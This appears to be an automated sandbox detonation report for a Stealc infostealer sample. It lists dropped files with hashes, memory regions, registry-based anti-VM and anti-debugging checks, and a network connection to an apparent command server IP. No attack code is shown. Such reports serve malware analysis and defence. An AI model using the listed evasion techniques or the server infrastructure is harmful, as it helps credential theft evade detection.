memory/1124-597-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2652-608-0x0000000006BA0000-0x0000000007033000-memory.dmp
memory/2308-633-0x0000000003BF0000-0x0000000003ECF000-memory.dmp
memory/2480-634-0x0000000000400000-0x00000000006DF000-memory.dmp
memory/2652-636-0x0000000006BA0000-0x000000000702B000-memory.dmp
memory/2720-635-0x0000000000A80000-0x0000000000F13000-memory.dmp
memory/2480-644-0x0000000000400000-0x00000000006DF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab1F74.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar1F87.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/2652-674-0x0000000006BA0000-0x000000000702B000-memory.dmp
memory/292-675-0x0000000000180000-0x000000000060B000-memory.dmp
memory/2720-677-0x0000000000A80000-0x0000000000F13000-memory.dmp
memory/2652-678-0x0000000001370000-0x0000000001692000-memory.dmp
memory/292-679-0x0000000000180000-0x000000000060B000-memory.dmp
memory/292-680-0x0000000000180000-0x000000000060B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
| MD5 | a67e34baacfca98f323981d3b0087f3b |
| SHA1 | d22ccae2971df83812acaebc750d9a2c87357fe5 |
| SHA256 | 6092579a997945b10d3f279693baa004d180417ccfec941c45eb20705a2b4706 |
| SHA512 | 39c7a33ab14e518a09f4e022c1c61c8b5a88417af3ce5a1769ab8c0fa328a178fcd79a098c4c7f3344df75e2b7cd22ebf6a88d43ad61599c53a3c89d54c29d6d |
C:\Users\Admin\AppData\Local\Temp\Audit.cmd
| MD5 | 9da23439e34b0498b82ae193c5a8f3a8 |
| SHA1 | ae20bbe7fac03c94e42f4dd206d89003faae7899 |
| SHA256 | 0f241cc0324871a1a900a7ac0edf889a8d12875b1072f44856cc979a4b7a77ac |
| SHA512 | cd4b262753b4f5f1dac09c20fa64ebdee00cf4a3fce92287a7439df943ea65bdf8569f541c2668b2164139b91facccfb3c98db8ad8f686637f4e317583cc98a2 |
C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
| MD5 | 6ee7ddebff0a2b78c7ac30f6e00d1d11 |
| SHA1 | f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2 |
| SHA256 | 865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4 |
| SHA512 | 57d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0 |
memory/2308-1036-0x0000000003BF0000-0x0000000003ECF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1012579001\015311d53f.exe
| MD5 | 623d073b8d01e00cbb5294ff07fe238a |
| SHA1 | c3aeeb4de6cd38209944e7a1c3ecaa3f411f8775 |
| SHA256 | ce50862f51244b9dce6dbde2bc96fa852cff8ca84b720797894a3f43f4e293ca |
| SHA512 | dc1fe9e39173bfd1e2722125b1385cf8c15e2570b65c1d5acb320a70d073d39a1a25f3665a87ccb3b8a0aaf7b7e63edb21e8e3cd4c3ac27e9cda237b54979824 |
memory/2308-1051-0x0000000000400000-0x00000000004BC000-memory.dmp
memory/1124-1049-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2480-1055-0x0000000000400000-0x00000000006DF000-memory.dmp
memory/2480-1059-0x0000000060900000-0x0000000060992000-memory.dmp
memory/1076-1060-0x0000000000400000-0x0000000000C62000-memory.dmp
memory/2652-1057-0x0000000006BA0000-0x0000000007402000-memory.dmp
memory/2652-1056-0x0000000006BA0000-0x0000000007402000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1012580001\6f3509a2c1.exe
| MD5 | d124690a731b9f9511d39dda3a5ef3d8 |
| SHA1 | 26fc68f194903e93db04711c9524c442845b583c |
| SHA256 | 47cb2f5b689678b3292f548d7346c6b400dedc6a2b1dde54b2e343b8b5fc2775 |
| SHA512 | e936a771891f85dca11f607acaae7780e9b11eb7ae7afcbc6273ce2386f1d9739c2db55b45c5a8fb4de2af84636e7610cfba096d0a26ab7c31d25176dcf22634 |
memory/1916-1076-0x0000000000A70000-0x0000000000EFC000-memory.dmp
memory/2652-1075-0x0000000006480000-0x000000000690C000-memory.dmp
memory/2652-1077-0x0000000001370000-0x0000000001692000-memory.dmp
memory/2652-1078-0x0000000006BA0000-0x0000000007402000-memory.dmp
memory/1076-1079-0x0000000000400000-0x0000000000C62000-memory.dmp
memory/2480-1082-0x0000000000400000-0x00000000006DF000-memory.dmp
memory/1076-1084-0x0000000000400000-0x0000000000C62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1012581001\be61ddc95d.exe
| MD5 | 343a771efad9c921a3abb8d4201f6040 |
| SHA1 | b142b17a0dfb82b75071950eba743d0150ad12ff |
| SHA256 | 6d08fa0a96bed6936121d80a60807e6682f0e1ce65f4fca2006fffcf109aa85e |
| SHA512 | d0ebd4de115ae62ea6d7aee7e636f767fe8823b09a0beb22bf64805ea4f01034b7b89092fe0083d9bc694fea3fe2d457aeadff49b4a17c81bc099861620c91e2 |
memory/1916-1106-0x0000000000A70000-0x0000000000EFC000-memory.dmp
memory/2652-1107-0x0000000006BA0000-0x000000000709F000-memory.dmp
memory/2652-1105-0x0000000006480000-0x000000000690C000-memory.dmp
memory/1752-1108-0x0000000000DD0000-0x00000000012CF000-memory.dmp
memory/1916-1110-0x0000000000A70000-0x0000000000EFC000-memory.dmp
memory/2652-1109-0x0000000001370000-0x0000000001692000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1012582001\00c0967b44.exe
| MD5 | 8746d7ddcd593e7a9a38016b27a6dde0 |
| SHA1 | a505737a7bebefbd81d28d729e26187d15ea3aa7 |
| SHA256 | 159e04da0b72590135477fa37369439acc2dd400ba28af7597ab05f0be906280 |
| SHA512 | 9d2c4372c85f2f176f5034c4eb54ba1290260b69cd760fb17e7f3a54ecb490290fa033716f2019231c50b321d314e36b5d6003253e176be8d250cbe689e45b52 |
memory/1916-1123-0x0000000000A70000-0x0000000000EFC000-memory.dmp
memory/2480-1130-0x0000000000400000-0x00000000006DF000-memory.dmp
memory/1076-1132-0x0000000000400000-0x0000000000C62000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\prefs.js
| MD5 | 2fa9fe8b4aa3b24d6bae503f90266715 |
| SHA1 | a0bd6dfee5991f236690aeb2d0584cc88f65b0d8 |
| SHA256 | d972e793fcd6390f2855c61da019a7dd823379f2cc32583eddb0328190a37305 |
| SHA512 | a81d61c628188e1fdea5a775fec1795dc8a861393558cb74795af6ff0095540bd67dc7e93a4899a1d3207f7d644643fec3dc7e05127c3ba38eb12adae508c415 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\datareporting\glean\db\data.safe.bin
| MD5 | a1e31c505f730f498f4e2b5ed52ba550 |
| SHA1 | 524fae712d3cce18ac291b8b241385c560f2bd9a |
| SHA256 | f3f7a7fd939b55f6d234d144c5a12f71318399295949d20be1737a56d90c805b |
| SHA512 | 7d40d87c70f3eaf6b1e8a7e15e5c749ff080838caca4030280cb18dd1f3548a3bc892ed32af03f00cd65488767fad2fa7cdc3f9e723bea672f54357bfb9dafcd |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\datareporting\glean\pending_pings\c67f7cb9-cdcd-4ca8-b248-36742778c1ab
| MD5 | 3b23ea31b8103b0f88e0c678658ea5aa |
| SHA1 | 86f782b79677b6d02228061f2970061cbf424a95 |
| SHA256 | 8abc6e4448709b322577e49ff33ee329706d38d2283a4e656fbbf6adb28a7ed8 |
| SHA512 | 9c59070fc2c6be5202b23f663098498b9b4680a24ac37052b95e5439f82df9cd4988a4898ef5f8f2d31638897beefb9a8981d3a6a7eab1d88e9832da330858fd |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | da1cc71e2b07a2dcb8a73d3beebf5319 |
| SHA1 | 0135a61831d0a35a05c15ad712dbdb458caab687 |
| SHA256 | df31357cbace64fa41340eaba2869da503f7a83a219e8f6b61c4b5e28b26cba3 |
| SHA512 | e17869f509763f9be7318624c3b2233ad385c1ef4e8c6c0c9ef1e79f732fce3a1aa63e2a10bdc3ac95f0ab6b942a94d5aee8e2ab7683f56e2bc4191af7b44466 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
| MD5 | 96c542dec016d9ec1ecc4dddfcbaac66 |
| SHA1 | 6199f7648bb744efa58acf7b96fee85d938389e4 |
| SHA256 | 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798 |
| SHA512 | cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658 |
C:\Users\Admin\AppData\Local\Temp\1012583001\26623c4c44.exe
| MD5 | fc6804a55358a117689dab9333fd0ee5 |
| SHA1 | bbe4309bc6d99a67ecc0e866907889659d8e7031 |
| SHA256 | 4decdc379789942364429bbbed02dda060d79e613ed657ca541fd5f37873fd58 |
| SHA512 | 6a7b08a022cb25bfa0f906ba50a322bf3a7333e28d083d73c848d220789530f6ad31a65c0b7baf062c3cb5be30128a9af0d3fb43ea714f72f7b1b7bcf622271c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\prefs-1.js
| MD5 | 9a28f84af1d4819722e2c2c90137aedb |
| SHA1 | 0ee9109cf09115074e23e8a23c1c3214da5e2b0f |
| SHA256 | d9253d23adf0d6ad78a4cb5f6b8f84baf99996db1c82f655ee920399c11a3b9a |
| SHA512 | 4b3a003053c4a629958ba522448db28bf39066d43192925fbf05074ce115cb03219593935a5332f11c72dbcc24e866b8d583ae2421a3fa9b048ce55a5a35f18a |
memory/1236-1275-0x0000000000C60000-0x0000000000F08000-memory.dmp
memory/1236-1274-0x0000000000C60000-0x0000000000F08000-memory.dmp
memory/2652-1280-0x0000000006BA0000-0x000000000709F000-memory.dmp
memory/2652-1281-0x0000000001370000-0x0000000001692000-memory.dmp
memory/1076-1294-0x0000000000400000-0x0000000000C62000-memory.dmp
memory/2480-1292-0x0000000000400000-0x00000000006DF000-memory.dmp
memory/2652-1306-0x0000000001370000-0x0000000001692000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 55e17194b6a4078557fcd28f9d62eae9 |
| SHA1 | c773aa23db448783310b817a25d9a762306c8e2e |
| SHA256 | e414b39847913bc2e11ccbe71688fbff4acac75a2f8d86bc160b8edd54b21a3a |
| SHA512 | 3fbdb310d07d8c3e1c0b8c7afe3cdad3aecea2a0ce733205fbabd4235805679a70c46f97ccfd132e891e2b51ff8e747ccca59f963a62cde1291ba2a171fe66f4 |
memory/2480-1317-0x0000000000400000-0x00000000006DF000-memory.dmp
memory/1076-1319-0x0000000000400000-0x0000000000C62000-memory.dmp
memory/3484-1320-0x0000000000230000-0x0000000000634000-memory.dmp
memory/3484-1321-0x0000000000230000-0x0000000000634000-memory.dmp
memory/3484-1323-0x0000000000230000-0x0000000000634000-memory.dmp
memory/3484-1324-0x00000000007F0000-0x00000000007FE000-memory.dmp
memory/3484-1325-0x0000000004CF0000-0x0000000004D4C000-memory.dmp
memory/3484-1326-0x0000000000A50000-0x0000000000A62000-memory.dmp
memory/3484-1327-0x0000000000BA0000-0x0000000000BA8000-memory.dmp
memory/3484-1328-0x0000000000D50000-0x0000000000D58000-memory.dmp
memory/3484-1329-0x0000000000D60000-0x0000000000D68000-memory.dmp
memory/3484-1330-0x0000000000E70000-0x0000000000E88000-memory.dmp
memory/3484-1331-0x0000000000F00000-0x0000000000F10000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 85430baed3398695717b0263807cf97c |
| SHA1 | fffbee923cea216f50fce5d54219a188a5100f41 |
| SHA256 | a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e |
| SHA512 | 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
| MD5 | fe3355639648c417e8307c6d051e3e37 |
| SHA1 | f54602d4b4778da21bc97c7238fc66aa68c8ee34 |
| SHA256 | 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e |
| SHA512 | 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
| MD5 | 3d33cdc0b3d281e67dd52e14435dd04f |
| SHA1 | 4db88689282fd4f9e9e6ab95fcbb23df6e6485db |
| SHA256 | f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b |
| SHA512 | a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\prefs-1.js
| MD5 | 3d04b9c3c9285ea7f5941d10c2815373 |
| SHA1 | 91cd807bd933da2c0cec4a3cae0ad25fdf1d1c8c |
| SHA256 | cdbc7b2edf75aa154766eb34bd0de6d3d09fe265ed511c3418dcfa6e2f8aaa6e |
| SHA512 | 08fd97394fdb66b2094b501f89f043bc3507df4352bdae1643f89b76a5e5fd9755063d4f75ae8a32fa6e62bc2f90eec69fda225c52cd3e7ef7aafc159a6ca615 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | a01c5ecd6108350ae23d2cddf0e77c17 |
| SHA1 | c6ac28a2cd979f1f9a75d56271821d5ff665e2b6 |
| SHA256 | 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42 |
| SHA512 | b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
| MD5 | 49ddb419d96dceb9069018535fb2e2fc |
| SHA1 | 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6 |
| SHA256 | 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539 |
| SHA512 | 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
| MD5 | 8be33af717bb1b67fbd61c3f4b807e9e |
| SHA1 | 7cf17656d174d951957ff36810e874a134dd49e0 |
| SHA256 | e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd |
| SHA512 | 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
| MD5 | 33bf7b0439480effb9fb212efce87b13 |
| SHA1 | cee50f2745edc6dc291887b6075ca64d716f495a |
| SHA256 | 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e |
| SHA512 | d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
| MD5 | 688bed3676d2104e7f17ae1cd2c59404 |
| SHA1 | 952b2cdf783ac72fcb98338723e9afd38d47ad8e |
| SHA256 | 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237 |
| SHA512 | 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
| MD5 | 937326fead5fd401f6cca9118bd9ade9 |
| SHA1 | 4526a57d4ae14ed29b37632c72aef3c408189d91 |
| SHA256 | 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81 |
| SHA512 | b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2 |
C:\Users\Admin\AppData\Local\Temp\download.bat
| MD5 | f2a75175c8082ccd3e1713b00556a6e2 |
| SHA1 | 2f5dc37978320bc1ca207c0c0aff1240aad6c7cf |
| SHA256 | 019157c15709f7d6301cb0fb15f45c054230ea91f06ff817b426d7f6ccb14686 |
| SHA512 | 011ab44e81d61636d5b1637584faf0701a5b2226289b6200cd89ad97927f52f1c659df626afc2b46edd656960d67934fff97f5e10fd6a7454027d430feafa7a9 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RD8IME3VAQE26EJWN2J8.temp
| MD5 | a9cfea81a690243a7a0b624b58930643 |
| SHA1 | c15f7c3d8940a2a49aa1e5d8def555a0c8988e1c |
| SHA256 | ef06e634dd16f50d2666f6210a821c953130f5f43d478840ea8ed1bd6fb6ab31 |
| SHA512 | 5c5b3763472d9db15c17994cf43192b229dfec43ad7f7a0260d6de4e11d8580616ad79d42403d17abdad1c9a1483894eb4c5db6ab22a6201ff88c27d18e8d538 |
C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat
| MD5 | d1fdfad5ce7134b1ef5a54cf37001031 |
| SHA1 | 82e0f4e953b3aeaca622ec071639baf6ae17aadb |
| SHA256 | 54f8474d983dc3dd78e3d3289076152651e2f8cc5f30ae3f2740ba15e71cc6a6 |
| SHA512 | b6b7b4f134a6b436cd32e39fb645d91acc12482d352158a755359d0f6cbb8fd5bab9351081916b0b638e3ff2bde4b6ac2f6202f3ca58f1146f39defc039e88e7 |
C:\Users\Admin\AppData\Local\Temp\runsteal.bat
| MD5 | 744f8978db36b4b9db7cb6e5c8c41e08 |
| SHA1 | 84321921f622d20a4d40c9bef43b7744e74aaee7 |
| SHA256 | cedfe277f8c600679365ce2c54a9c303907a0acadc23ed6e6968746d2e8ca468 |
| SHA512 | d1584b2134bf3960af33a514b3a9fba69c7eb2fbbc3b0cffe7e493f182b20547f7596012fcc5e6b5ffbefee5a0b7d1afe45eee822cff5b0720ffd6292af2394f |
memory/3560-1473-0x0000000001170000-0x000000000119E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\prefs-1.js
| MD5 | 703ea59384654d8f3ec4334faf71d604 |
| SHA1 | a19bb63af8d4972ef01305b4e457ac9727904402 |
| SHA256 | 56f12e994e3a21189302a5e2e0820a24d95f1686e501f5f9d91c7f5cf63f639a |
| SHA512 | 6a0bc06a7d49f9eaf8b005bf9e35c1046d382bf4fd19a152a00d3b6e3820debf2f12b86ab4d2b913fb48712dd9ebc07a7b3ef4d4e0e5715db6cf6fb71795c956 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-06 02:25
Reported
2024-12-06 02:28
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
144s
Command Line
Signatures
Stealc
Stealc family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe
"C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| RU | 185.215.113.206:80 | 185.215.113.206 | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
memory/4308-0-0x0000000000560000-0x0000000000A50000-memory.dmp
memory/4308-1-0x0000000077D34000-0x0000000077D36000-memory.dmp
memory/4308-3-0x0000000000560000-0x0000000000A50000-memory.dmp
memory/4308-2-0x0000000000561000-0x00000000007AA000-memory.dmp
memory/4308-4-0x0000000000560000-0x0000000000A50000-memory.dmp
memory/4308-5-0x0000000000561000-0x00000000007AA000-memory.dmp